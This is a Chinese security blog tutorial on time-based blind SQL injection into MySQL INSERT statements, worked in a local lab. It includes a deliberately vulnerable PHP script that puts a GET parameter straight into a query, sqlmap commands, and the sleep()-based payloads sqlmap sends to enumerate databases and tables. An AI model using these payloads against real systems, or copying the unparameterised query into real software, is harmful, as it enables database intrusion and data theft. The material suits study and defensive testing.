mysql注入执行insert_mysql insert延时注入 | CN-SEC 中文网

摘要

首先建个数据库和一张表：

create database blog;

create table admin(id int primary key auto_increment,email varchar(500));

写个insert.php方便sqlmap跑：

$conn=mysql _connect(“localhost”,”root “,”yourpass”);

mysql_select_db(“admin”,$conn);

if(isset($_GET[“email”])){

$email=$_GET[’email’];

mysql _query(“insert into admin(email) values(‘$emal’)”);

}

?>

用seay的mysql监控来监控数据库执行的语句，这样比抓包要方便一些。

sqlmap -u http://127.0.0.1/[email protected]

测试出延时注入,payload是[email protected]’ and sleep(5) and ‘ufwy’=’ufwy

那么对应的数据库执行语句就应该为:

insert into admin(email) values(‘[email protected]’ and sleep(5) and ‘ufwy’=’ufwy’);

在mysql监控里查看下它是怎么跑–dbs的：

insert into admin(email)values(‘[email protected]’ AND 4830=IF((ORD(MID((SELECT IFNULL(CAST(COUNT(DISTINCT(schema_name)) AS CHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),1,1)) > 51),SLEEP(5),4830) AND ‘XDSc’=’XDSc’)

insert into admin(email)values(‘[email protected]’ AND 6499=IF((ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),0x20)) FROM INFORMATION_SCHEMA.SCHEMATA LIMIT 0,1),1,1)) > 64),SLEEP(2),6499) AND ‘ngXr’=’ngX r’)

-D blog –tables

insert into admin(email)values(‘[email protected]’ AND 3039=IF((ORD(MID((SELECT IFNULL(CAST(table_name AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x626c6f67 LIMIT 1,1),7,1)) > 112),SLEEP(6),3039) AND ‘sAEl’=’sAEl’)

-D blog -T admin –dump

果没有跑出来，延时注入的局限性太大了，当然也有insert报错注入 的情况，只是不适合上面这种情况。

总之insert into延时注入的核心就是:

insert into blog(email) values(‘[email protected]’ and if(true,sleep(5),0);